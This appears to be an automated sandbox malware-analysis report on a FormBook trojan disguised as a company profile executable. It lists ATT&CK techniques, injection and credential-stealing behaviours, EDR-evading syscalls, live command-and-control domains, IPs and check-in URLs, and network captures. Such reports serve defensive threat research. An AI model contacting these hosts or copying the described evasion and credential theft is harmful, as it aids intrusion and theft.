              Data from Local System              		3
              Non-Application Layer Protocol              		Automated ExfiltrationData Encrypted for Impact
              Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
              Abuse Elevation Control Mechanism              		NTDS2
              File and Directory Discovery              		Distributed Component Object ModelInput Capture3
              Application Layer Protocol              		Traffic DuplicationData Destruction
              Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script4
              Obfuscated Files or Information              		LSA Secrets12
              System Information Discovery              		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
              Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts2
              Software Packing              		Cached Domain CredentialsWi-Fi DiscoveryVNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
              DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
              DLL Side-Loading              		DCSyncRemote System DiscoveryWindows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery

              Behavior Graph

              Hide Legend

              Legend:

              • Process
              • Signature
              • Created File
              • DNS/IP Info
              • Is Dropped
              • Is Windows Process
              • Number of created Registry Values
              • Number of created Files
              • Visual Basic
              • Delphi
              • Java
              • .Net C# or VB.NET
              • C, C++ or other language
              • Is malicious
              • Internet
              behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1627430 Sample: z1companyProfileandproducts.exe Startdate: 02/03/2025 Architecture: WINDOWS Score: 100 24 www.dappbtc.xyz 2->24 26 www.dd87558.vip 2->26 28 4 other IPs or domains 2->28 36 Suricata IDS alerts for network traffic 2->36 38 Antivirus / Scanner detection for submitted sample 2->38 40 Multi AV Scanner detection for submitted file 2->40 44 2 other signatures 2->44 9 z1companyProfileandproducts.exe 2->9         started        signatures3 42 Performs DNS queries to domains with low reputation 24->42 process4 signatures5 48 Maps a DLL or memory area into another process 9->48 12 cAPvHN0KfrpQXKK.exe 9->12 injected process6 signatures7 50 Found direct / indirect Syscall (likely to bypass EDR) 12->50 15 unregmp2.exe 13 12->15         started        process8 signatures9 52 Tries to steal Mail credentials (via file / registry access) 15->52 54 Tries to harvest and steal browser information (history, passwords, etc) 15->54 56 Modifies the context of a thread in another process (thread injection) 15->56 58 3 other signatures 15->58 18 cAPvHN0KfrpQXKK.exe 15->18 injected 22 firefox.exe 15->22         started        process10 dnsIp11 30 www.dd87558.vip 104.21.80.1, 49987, 49988, 49989 CLOUDFLARENETUS United States 18->30 32 orbt.zone 3.33.130.190, 49977, 49983, 49984 AMAZONEXPANSIONGB United States 18->32 34 www.dappbtc.xyz 13.248.169.48, 49979, 49980, 49981 AMAZON-02US United States 18->34 46 Found direct / indirect Syscall (likely to bypass EDR) 18->46 signatures12

              Screenshots

              Thumbnails

              This section contains all screenshots as thumbnails, including those not shown in the slideshow.


              windows-stand

              Antivirus, Machine Learning and Genetic Malware Detection

              Initial Sample

              SourceDetectionScannerLabelLink
              z1companyProfileandproducts.exe69%VirustotalBrowse
              z1companyProfileandproducts.exe71%ReversingLabsWin32.Backdoor.FormBook
              z1companyProfileandproducts.exe100%AviraTR/Crypt.ZPACK.Gen

              Dropped Files

              No Antivirus matches

              Unpacked PE Files

              No Antivirus matches

              Domains

              No Antivirus matches

              URLs

              SourceDetectionScannerLabelLink
              http://www.dappbtc.xyz/oiz0/?505xOj4=9v52S88T1gt5Tc2r5fMP4iQJv1OwsGvqWAUGmfB8mEPwD/VFfrObpLTzAs1Uk7jQTseEv8LuraBd/6FxjeW4VhjFroZ6+sME+SOo2g6WIidsbUGcBERugzeokGvmwW9kTw==&Fz_=qHEtbb90tLjTN0x00%Avira URL Cloudsafe
              http://www.dappbtc.xyz/oiz0/0%Avira URL Cloudsafe
              http://www.thefounder.ceo/je5x/0%Avira URL Cloudsafe
              http://www.thefounder.ceo/je5x/?505xOj4=SsfMhk4dJssrOiNp2G01dlzI+k/eTbfsdjnjc1R6LZ/pW30W4rr7y9ry7X+UgyNXNMtIRXvZ5DXQMf4LLsE11oRVNvKdTWL9WtrriEIGgs1R8zfOom7pbjefjfwzTRhqcA==&Fz_=qHEtbb90tLjTN0x00%Avira URL Cloudsafe
              http://www.dd87558.vip/uoki/0%Avira URL Cloudsafe
              http://www.dd87558.vip0%Avira URL Cloudsafe
              http://www.dd87558.vip/uoki/?505xOj4=hR9UOSbKbp2VMtCNgsThRLVgOj20o3kqc+HH/sAhIWQh/y8XK28Ees9JEd/zrjBVUS7En1yL3QSm+iVMrAfiT2KvS+Z+Z7/3ta2gK53urmJl5KknktZIr1czqmYoD40z/w==&Fz_=qHEtbb90tLjTN0x00%Avira URL Cloudsafe

              Domains and IPs

              Contacted Domains

              NameIPActiveMaliciousAntivirus DetectionReputation
              www.dd87558.vip
              		104.21.80.1
              		truetrue
                		unknown
                thefounder.ceo
                		3.33.130.190
                		truetrue
                  		unknown
                  orbt.zone
                  		3.33.130.190
                  		truetrue
                    		unknown
                    www.dappbtc.xyz
                    		13.248.169.48
                    		truetrue
                      		unknown
                      www.thefounder.ceo
                      		unknown
                      		unknownfalse
                        		unknown
                        www.orbt.zone
                        		unknown
                        		unknownfalse
                          		unknown

                          Contacted URLs

                          NameMaliciousAntivirus DetectionReputation
                          http://www.thefounder.ceo/je5x/true
                          • Avira URL Cloud: safe
                          		unknown
                          http://www.thefounder.ceo/je5x/?505xOj4=SsfMhk4dJssrOiNp2G01dlzI+k/eTbfsdjnjc1R6LZ/pW30W4rr7y9ry7X+UgyNXNMtIRXvZ5DXQMf4LLsE11oRVNvKdTWL9WtrriEIGgs1R8zfOom7pbjefjfwzTRhqcA==&Fz_=qHEtbb90tLjTN0x0true
                          • Avira URL Cloud: safe
                          		unknown
                          http://www.dappbtc.xyz/oiz0/true
                          • Avira URL Cloud: safe
                          		unknown
                          http://www.dappbtc.xyz/oiz0/?505xOj4=9v52S88T1gt5Tc2r5fMP4iQJv1OwsGvqWAUGmfB8mEPwD/VFfrObpLTzAs1Uk7jQTseEv8LuraBd/6FxjeW4VhjFroZ6+sME+SOo2g6WIidsbUGcBERugzeokGvmwW9kTw==&Fz_=qHEtbb90tLjTN0x0true
                          • Avira URL Cloud: safe
                          		unknown
                          http://www.dd87558.vip/uoki/true
                          • Avira URL Cloud: safe
                          		unknown
                          http://www.dd87558.vip/uoki/?505xOj4=hR9UOSbKbp2VMtCNgsThRLVgOj20o3kqc+HH/sAhIWQh/y8XK28Ees9JEd/zrjBVUS7En1yL3QSm+iVMrAfiT2KvS+Z+Z7/3ta2gK53urmJl5KknktZIr1czqmYoD40z/w==&Fz_=qHEtbb90tLjTN0x0true
                          • Avira URL Cloud: safe
                          		unknown

                          URLs from Memory and Binaries

                          NameSourceMaliciousAntivirus DetectionReputation
                          https://ac.ecosia.org/autocomplete?q=unregmp2.exe, 00000004.00000003.2896109163.0000000007B25000.00000004.00000020.00020000.00000000.sdmpfalse
                            		high
                            https://duckduckgo.com/chrome_newtabunregmp2.exe, 00000004.00000003.2896109163.0000000007B25000.00000004.00000020.00020000.00000000.sdmpfalse
                              		high
                              https://duckduckgo.com/ac/?q=unregmp2.exe, 00000004.00000003.2896109163.0000000007B25000.00000004.00000020.00020000.00000000.sdmpfalse
                                		high
                                https://www.google.com/images/branding/product/ico/googleg_lodp.icounregmp2.exe, 00000004.00000003.2896109163.0000000007B25000.00000004.00000020.00020000.00000000.sdmpfalse
                                  		high
                                  http://www.dd87558.vipcAPvHN0KfrpQXKK.exe, 00000005.00000002.3347240996.00000000010AA000.00000040.80000000.00040000.00000000.sdmpfalse
                                  • Avira URL Cloud: safe
                                  		unknown
                                  https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/searchunregmp2.exe, 00000004.00000003.2896109163.0000000007B25000.00000004.00000020.00020000.00000000.sdmpfalse
                                    		high
                                    https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=unregmp2.exe, 00000004.00000003.2896109163.0000000007B25000.00000004.00000020.00020000.00000000.sdmpfalse
                                      		high
                                      https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=unregmp2.exe, 00000004.00000003.2896109163.0000000007B25000.00000004.00000020.00020000.00000000.sdmpfalse
                                        		high
                                        https://www.ecosia.org/newtab/unregmp2.exe, 00000004.00000003.2896109163.0000000007B25000.00000004.00000020.00020000.00000000.sdmpfalse
                                          		high
                                          https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=unregmp2.exe, 00000004.00000003.2896109163.0000000007B25000.00000004.00000020.00020000.00000000.sdmpfalse
                                            		high

                                            World Map of Contacted IPs

                                            • No. of IPs < 25%
                                            • 25% < No. of IPs < 50%
                                            • 50% < No. of IPs < 75%
                                            • 75% < No. of IPs

                                            Public IPs

                                            IPDomainCountryFlagASNASN NameMalicious
                                            13.248.169.48
                                            		www.dappbtc.xyzUnited States
                                            		16509AMAZON-02UStrue
                                            3.33.130.190
                                            		thefounder.ceoUnited States
                                            		8987AMAZONEXPANSIONGBtrue
                                            104.21.80.1
                                            		www.dd87558.vipUnited States
                                            		13335CLOUDFLARENETUStrue

                                            General Information

                                            Joe Sandbox version:42.0.0 Malachite
                                            Analysis ID:1627430
                                            Start date and time:2025-03-02 12:01:17 +01:00
                                            Joe Sandbox product:CloudBasic
                                            Overall analysis duration:0h 7m 37s
                                            Hypervisor based Inspection enabled:false
                                            Report type:full
                                            Cookbook file name:default.jbs
                                            Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                            Number of analysed new started processes analysed:5
                                            Number of new started drivers analysed:0
                                            Number of existing processes analysed:0
                                            Number of existing drivers analysed:0
                                            Number of injected processes analysed:2
                                            Technologies:
                                            • HCA enabled
                                            • EGA enabled
                                            • AMSI enabled
                                            Analysis Mode:default
                                            Analysis stop reason:Timeout
                                            Sample name:z1companyProfileandproducts.exe
                                            Detection:MAL
                                            Classification:mal100.troj.spyw.evad.winEXE@5/1@4/3
                                            EGA Information:
                                            • Successful, ratio: 66.7%
                                            HCA Information:
                                            • Successful, ratio: 93%
                                            • Number of executed functions: 14
                                            • Number of non-executed functions: 328
                                            Cookbook Comments:
                                            • Found application associated with file extension: .exe

                                            Warnings

                                            • Exclude process from analysis (whitelisted): WMIADAP.exe, SIHClient.exe
                                            • Excluded IPs from analysis (whitelisted): 13.107.253.72, 52.149.20.212
                                            • Excluded domains from analysis (whitelisted): ocsp.digicert.com, otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                            • Execution Graph export aborted for target cAPvHN0KfrpQXKK.exe, PID 3372 because it is empty
                                            • Report creation exceeded maximum time and may have missing disassembly code information.
                                            • Report size exceeded maximum capacity and may have missing disassembly code.

                                            Simulations

                                            Behavior and APIs

                                            TimeTypeDescription
                                            06:03:53API Interceptor45x Sleep call for process: unregmp2.exe modified

                                            Joe Sandbox View / Context

                                            IPs

                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                            13.248.169.48PAYMENT INVOICE.vbsGet hashmaliciousFormBookBrowse
                                            • www.allenamento.xyz/6q5z/
                                            PO- 20250228246.vbsGet hashmaliciousFormBookBrowse
                                            • www.nakaligtas.xyz/lcrb/
                                            OxMBZZgTdc.exeGet hashmaliciousFormBookBrowse
                                            • www.needethereum.xyz/7t1k/
                                            RFQ 402.exeGet hashmaliciousFormBookBrowse
                                            • www.iooe.net/bi7u/
                                            Arrival Notice.exeGet hashmaliciousFormBookBrowse
                                            • www.bitcoinvideo.xyz/ebux/
                                            nicegirlfriendonherewithkissinglips.htaGet hashmaliciousCobalt Strike, FormBookBrowse
                                            • www.needethereum.xyz/7t1k/
                                            Remittance copy.exeGet hashmaliciousFormBookBrowse
                                            • www.iooe.net/bi7u/
                                            PO For Bulk Order.exeGet hashmaliciousFormBookBrowse
                                            • www.kedutaan.xyz/uzoe/
                                            PO-009172433.exeGet hashmaliciousFormBookBrowse
                                            • www.dogeeditor.xyz/rbht/
                                            Invoice Remittance ref27022558.exeGet hashmaliciousFormBookBrowse
                                            • www.multo.xyz/7pb3/
                                            3.33.130.190OxMBZZgTdc.exeGet hashmaliciousFormBookBrowse
                                            • www.pond-magic.shop/vhzb/
                                            Arrival Notice.exeGet hashmaliciousFormBookBrowse
                                            • www.spacewalker.app/yg7e/
                                            nicegirlfriendonherewithkissinglips.htaGet hashmaliciousCobalt Strike, FormBookBrowse
                                            • www.pond-magic.shop/vhzb/
                                            r8NEtlayynZa0PSH.exeGet hashmaliciousFormBookBrowse
                                            • www.7gcapital.club/i3yp/
                                            PAYROLL SUMMARY.exeGet hashmaliciousFormBookBrowse
                                            • www.ylv.media/b60q/
                                            URGENT REQUEST FOR QUOTATION.exeGet hashmaliciousFormBookBrowse
                                            • www.sirens94.net/om19/
                                            Re Request for Quote Conversion to USD and Price Validation.exeGet hashmaliciousFormBookBrowse
                                            • www.rootsandremedy.shop/ee40/
                                            Payment Copy.vbsGet hashmaliciousFormBookBrowse
                                            • www.ufin89.biz/n93z/
                                            PO#GREEN AURA.pdf.scr.exeGet hashmaliciousFormBookBrowse
                                            • www.ylv.media/exts/
                                            FRQ 101102-04-25-0948-015.exeGet hashmaliciousFormBookBrowse
                                            • www.ylv.media/mbjv/

                                            Domains

                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                            www.dd87558.vipvstdlib_s64.dll.dllGet hashmaliciousFormBookBrowse
                                            • 104.21.32.1

                                            ASNs

                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                            CLOUDFLARENETUSwindows.ps1Get hashmaliciousPureLog Stealer, VidarBrowse
                                            • 172.64.41.3
                                            posh_injected_payload.exeGet hashmaliciousLummaC StealerBrowse
                                            • 104.17.150.117
                                            Jodl2vHi4e.exeGet hashmaliciousDCRatBrowse
                                            • 172.67.186.200
                                            cbr.arm.elfGet hashmaliciousMiraiBrowse
                                            • 162.159.107.37
                                            QjFNdeFmzL.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                            • 104.21.3.239
                                            GoqoGDrNHD.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                            • 172.67.159.138
                                            SilverClient.exeGet hashmaliciousAsyncRAT, SilverRatBrowse
                                            • 162.159.138.232
                                            http://SMOKEDFINEFOOD.CO.UKGet hashmaliciousHTMLPhisherBrowse
                                            • 104.18.10.207
                                            captcha.exeGet hashmaliciousUnknownBrowse
                                            • 104.21.80.1
                                            http://url6308.xcitiumplatform.com/ls/clickGet hashmaliciousUnknownBrowse
                                            • 1.1.1.1
                                            AMAZONEXPANSIONGBOxMBZZgTdc.exeGet hashmaliciousFormBookBrowse
                                            • 3.33.130.190
                                            https://scribehow.com/page/Request_for_Proposal_RFP__qJcfOklYQRy3AAQjXCM51wGet hashmaliciousInvisible JSBrowse
                                            • 52.223.19.107
                                            http://913.ai/Get hashmaliciousHTMLPhisherBrowse
                                            • 52.223.52.2
                                            Arrival Notice.exeGet hashmaliciousFormBookBrowse
                                            • 3.33.130.190
                                            nicegirlfriendonherewithkissinglips.htaGet hashmaliciousCobalt Strike, FormBookBrowse
                                            • 3.33.130.190
                                            https://www.mediafire.com/file_premium/d6r4c3nzfv9mgl7/glass.mp3/fileGet hashmaliciousUnknownBrowse
                                            • 52.223.34.155
                                            Swift Copy#8637598258786.vbsGet hashmaliciousFormBook, GuLoaderBrowse
                                            • 3.33.130.190
                                            https://get.massive.io/01JN3AZQ8YNTV4AVJSHMNFYGWY?secret=vAJbcqnYWDjirxiWGet hashmaliciousUnknownBrowse
                                            • 52.223.55.7
                                            http://pixcams.comGet hashmaliciousUnknownBrowse
                                            • 3.33.220.150
                                            http://mail.aestheticfina.comGet hashmaliciousUnknownBrowse
                                            • 3.33.220.150
                                            AMAZON-02USwindows.ps1Get hashmaliciousPureLog Stealer, VidarBrowse
                                            • 18.244.18.32
                                            na.elfGet hashmaliciousPrometeiBrowse
                                            • 54.171.230.55
                                            cbr.mips.elfGet hashmaliciousMiraiBrowse
                                            • 34.243.167.122
                                            cbr.arm7.elfGet hashmaliciousMiraiBrowse
                                            • 18.159.173.40
                                            cbr.ppc.elfGet hashmaliciousMiraiBrowse
                                            • 65.3.44.84
                                            nuklear.spc.elfGet hashmaliciousMiraiBrowse
                                            • 34.249.145.219
                                            cbr.arm5.elfGet hashmaliciousMiraiBrowse
                                            • 18.227.210.25
                                            cbr.arm7.elfGet hashmaliciousMiraiBrowse
                                            • 18.175.16.25
                                            http://costca.caGet hashmaliciousUnknownBrowse
                                            • 3.21.173.71
                                            SilverClient.exeGet hashmaliciousAsyncRAT, SilverRatBrowse
                                            • 3.138.180.119

                                            JA3 Fingerprints

                                            No context

                                            Dropped Files

                                            No context

                                            Created / dropped Files

                                            C:\Users\user\AppData\Local\Temp\7291789G1

                                            Download File
                                            Process:C:\Windows\SysWOW64\unregmp2.exe
                                            File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 8
                                            Category:dropped
                                            Size (bytes):196608
                                            Entropy (8bit):1.121297215059106
                                            Encrypted:false
                                            SSDEEP:384:72qOB1nxCkvSAELyKOMq+8yC8F/YfU5m+OlT:qq+n0E9ELyKOMq+8y9/Ow
                                            MD5:D87270D0039ED3A5A72E7082EA71E305
                                            SHA1:0FBACFA8029B11A5379703ABE7B392C4E46F0BD2
                                            SHA-256:F142782D1E80D89777EFA82C9969E821768DE3E9713FC7C1A4B26D769818AAAA
                                            SHA-512:18BB9B498C225385698F623DE06F93F9CFF933FE98A6D70271BC6FA4F866A0763054A4683B54684476894D9991F64CAC6C63A021BDFEB8D493310EF2C779638D
                                            Malicious:false
                                            Reputation:high, very likely benign file
                                            Preview:SQLite format 3......@ .......Y...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                            Static File Info

                                            General

                                            File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                            Entropy (8bit):7.9674571283378635
                                            TrID:
                                            • Win32 Executable (generic) a (10002005/4) 99.96%
                                            • Generic Win/DOS Executable (2004/3) 0.02%
                                            • DOS Executable Generic (2002/1) 0.02%
                                            • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                            File name:z1companyProfileandproducts.exe
                                            File size:288'768 bytes
                                            MD5:69fd79206053b8c32283a87ffebb38ae
                                            SHA1:347d8d82970ead463e0497a082df88ab8b74ac49
                                            SHA256:7714e81aa7cf6d3614e229c000c114452847e2eaa2ae89896481b35413c12f48
                                            SHA512:c6bcd1f9c2b018ffb86eb72c54f7edefdf6c9d0f05bdda1b4df265ad5a984928c8c3733f5abd81883e32bb10088bf4fe6c70e522629cb31ff203d0876999f501
                                            SSDEEP:6144:ghH7M011ucc6Nv8Oel6qq9doLTOVXtVVJuFeAr:ghHD2crv5MqrqsJuYw
                                            TLSH:415423BAA51EF778C09D4A3C783B9643108F5BB471898F5B98D12CF2D8A08B959713CD
                                            File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......y...=`g.=`g.=`g.....:`g.....<`g.....<`g.Rich=`g.........PE..L....$.Z.................V..........P........p....@................

                                            File Icon

                                            Icon Hash:90cececece8e8eb0

                                            Static PE Info

                                            General

                                            Entrypoint:0x401450
                                            Entrypoint Section:.text
                                            Digitally signed:false
                                            Imagebase:0x400000
                                            Subsystem:windows gui
                                            Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                            DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
                                            Time Stamp:0x5A9224EC [Sun Feb 25 02:52:28 2018 UTC]
                                            TLS Callbacks:
                                            CLR (.Net) Version:
                                            OS Version Major:6
                                            OS Version Minor:0
                                            File Version Major:6
                                            File Version Minor:0
                                            Subsystem Version Major:6
                                            Subsystem Version Minor:0
                                            Import Hash:

                                            Entrypoint Preview

                                            Instruction
                                            push ebp
                                            mov ebp, esp
                                            sub esp, 00000450h
                                            push ebx
                                            push esi
                                            push edi
                                            push 00000418h
                                            lea eax, dword ptr [ebp-0000044Ch]
                                            push 00000000h
                                            push eax
                                            mov dword ptr [ebp-00000450h], 00000000h
                                            call 00007FCFACE4544Ch
                                            xor ebx, ebx
                                            mov edi, 000050D1h
                                            mov dword ptr [ebp-34h], 00006CE9h
                                            mov dword ptr [ebp-30h], 000063BEh
                                            mov dword ptr [ebp-2Ch], 00004837h
                                            mov dword ptr [ebp-24h], 00002049h
                                            mov dword ptr [ebp-28h], 00001394h
                                            call 00007FCFACE4570Dh
                                            mov dword ptr [ebp-0000013Ch], eax
                                            lea eax, dword ptr [ebp-00000290h]
                                            push eax
                                            push 00001441h
                                            call 00007FCFACE43756h
                                            lea eax, dword ptr [ebp-00000130h]
                                            push eax
                                            push 0000480Eh
                                            call 00007FCFACE43745h
                                            add esp, 1Ch
                                            mov ecx, 00004EBAh
                                            mov edx, 000000F0h
                                            mov eax, 0000005Dh
                                            cmp eax, 000000F0h
                                            cmovnle eax, edx
                                            dec ecx
                                            jne 00007FCFACE43A07h
                                            lea eax, dword ptr [ebp-00000130h]
                                            push 23881B80h
                                            push eax
                                            call 00007FCFACE44097h
                                            lea eax, dword ptr [ebp-00000130h]
                                            push eax
                                            lea eax, dword ptr [ebp-00000290h]
                                            push 00000009h
                                            push eax
                                            call 00007FCFACE45412h
                                            lea eax, dword ptr [ebp+00FFFD70h]

                                            Rich Headers

                                            Programming Language:
                                            • [C++] VS2012 build 50727
                                            • [ASM] VS2012 build 50727
                                            • [LNK] VS2012 build 50727

                                            Data Directories

                                            NameVirtual AddressVirtual Size Is in Section
                                            IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                            IMAGE_DIRECTORY_ENTRY_IMPORT0x00x0
                                            IMAGE_DIRECTORY_ENTRY_RESOURCE0x00x0
                                            IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                            IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                            IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                                            IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                            IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                            IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                            IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                            IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                            IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                            IMAGE_DIRECTORY_ENTRY_IAT0x00x0
                                            IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                            IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                            IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                            Sections

                                            NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                            .text0x10000x455a40x456006792996bf7de4181be473124033b83caFalse0.9904103322072072data7.996410137390471IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

                                            Network Behavior

                                            Suricata IDS Alerts

                                            TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                            2025-03-02T12:03:30.025606+01002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.5499773.33.130.19080TCP
                                            2025-03-02T12:03:30.025606+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.5499773.33.130.19080TCP
                                            2025-03-02T12:03:45.576198+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.54997913.248.169.4880TCP
                                            2025-03-02T12:03:48.095772+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.54998013.248.169.4880TCP
                                            2025-03-02T12:03:50.667982+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.54998113.248.169.4880TCP
                                            2025-03-02T12:03:54.274363+01002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.54998213.248.169.4880TCP
                                            2025-03-02T12:03:54.274363+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.54998213.248.169.4880TCP
                                            2025-03-02T12:03:59.785975+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.5499833.33.130.19080TCP
                                            2025-03-02T12:04:02.423509+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.5499843.33.130.19080TCP
                                            2025-03-02T12:04:04.932495+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.5499853.33.130.19080TCP
                                            2025-03-02T12:04:07.466799+01002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.5499863.33.130.19080TCP
                                            2025-03-02T12:04:07.466799+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.5499863.33.130.19080TCP
                                            2025-03-02T12:04:13.385122+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.549987104.21.80.180TCP
                                            2025-03-02T12:04:16.022797+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.549988104.21.80.180TCP
                                            2025-03-02T12:04:18.575429+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.549989104.21.80.180TCP
                                            2025-03-02T12:04:21.067278+01002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.549990104.21.80.180TCP
                                            2025-03-02T12:04:21.067278+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.549990104.21.80.180TCP

                                            Network Port Distribution

                                            TCP Packets

                                            TimestampSource PortDest PortSource IPDest IP
                                            Mar 2, 2025 12:03:29.560282946 CET4997780192.168.2.53.33.130.190
                                            Mar 2, 2025 12:03:29.565308094 CET80499773.33.130.190192.168.2.5
                                            Mar 2, 2025 12:03:29.565382957 CET4997780192.168.2.53.33.130.190
                                            Mar 2, 2025 12:03:29.574640036 CET4997780192.168.2.53.33.130.190
                                            Mar 2, 2025 12:03:29.579632998 CET80499773.33.130.190192.168.2.5
                                            Mar 2, 2025 12:03:30.025393009 CET80499773.33.130.190192.168.2.5
                                            Mar 2, 2025 12:03:30.025494099 CET80499773.33.130.190192.168.2.5
                                            Mar 2, 2025 12:03:30.025605917 CET4997780192.168.2.53.33.130.190
                                            Mar 2, 2025 12:03:30.028743029 CET4997780192.168.2.53.33.130.190
                                            Mar 2, 2025 12:03:30.033813000 CET80499773.33.130.190192.168.2.5
                                            Mar 2, 2025 12:03:45.085264921 CET4997980192.168.2.513.248.169.48
                                            Mar 2, 2025 12:03:45.090487003 CET804997913.248.169.48192.168.2.5
                                            Mar 2, 2025 12:03:45.090689898 CET4997980192.168.2.513.248.169.48
                                            Mar 2, 2025 12:03:45.108382940 CET4997980192.168.2.513.248.169.48
                                            Mar 2, 2025 12:03:45.113512039 CET804997913.248.169.48192.168.2.5
                                            Mar 2, 2025 12:03:45.575951099 CET804997913.248.169.48192.168.2.5
                                            Mar 2, 2025 12:03:45.576057911 CET804997913.248.169.48192.168.2.5
                                            Mar 2, 2025 12:03:45.576198101 CET4997980192.168.2.513.248.169.48
                                            Mar 2, 2025 12:03:46.613672972 CET4997980192.168.2.513.248.169.48
                                            Mar 2, 2025 12:03:47.632402897 CET4998080192.168.2.513.248.169.48
                                            Mar 2, 2025 12:03:47.637633085 CET804998013.248.169.48192.168.2.5
                                            Mar 2, 2025 12:03:47.637753010 CET4998080192.168.2.513.248.169.48
                                            Mar 2, 2025 12:03:47.650093079 CET4998080192.168.2.513.248.169.48
                                            Mar 2, 2025 12:03:47.655152082 CET804998013.248.169.48192.168.2.5
                                            Mar 2, 2025 12:03:48.095664024 CET804998013.248.169.48192.168.2.5
                                            Mar 2, 2025 12:03:48.095726967 CET804998013.248.169.48192.168.2.5
                                            Mar 2, 2025 12:03:48.095772028 CET4998080192.168.2.513.248.169.48
                                            Mar 2, 2025 12:03:49.160495996 CET4998080192.168.2.513.248.169.48
                                            Mar 2, 2025 12:03:50.179392099 CET4998180192.168.2.513.248.169.48
                                            Mar 2, 2025 12:03:50.184648991 CET804998113.248.169.48192.168.2.5
                                            Mar 2, 2025 12:03:50.184776068 CET4998180192.168.2.513.248.169.48
                                            Mar 2, 2025 12:03:50.198302984 CET4998180192.168.2.513.248.169.48
                                            Mar 2, 2025 12:03:50.203378916 CET804998113.248.169.48192.168.2.5
                                            Mar 2, 2025 12:03:50.203464985 CET804998113.248.169.48192.168.2.5
                                            Mar 2, 2025 12:03:50.667792082 CET804998113.248.169.48192.168.2.5
                                            Mar 2, 2025 12:03:50.667862892 CET804998113.248.169.48192.168.2.5
                                            Mar 2, 2025 12:03:50.667982101 CET4998180192.168.2.513.248.169.48
                                            Mar 2, 2025 12:03:51.708746910 CET4998180192.168.2.513.248.169.48
                                            Mar 2, 2025 12:03:52.726243973 CET4998280192.168.2.513.248.169.48
                                            Mar 2, 2025 12:03:52.731522083 CET804998213.248.169.48192.168.2.5
                                            Mar 2, 2025 12:03:52.732846975 CET4998280192.168.2.513.248.169.48
                                            Mar 2, 2025 12:03:52.742511034 CET4998280192.168.2.513.248.169.48
                                            Mar 2, 2025 12:03:52.747636080 CET804998213.248.169.48192.168.2.5
                                            Mar 2, 2025 12:03:54.274168015 CET804998213.248.169.48192.168.2.5
                                            Mar 2, 2025 12:03:54.274202108 CET804998213.248.169.48192.168.2.5
                                            Mar 2, 2025 12:03:54.274363041 CET4998280192.168.2.513.248.169.48
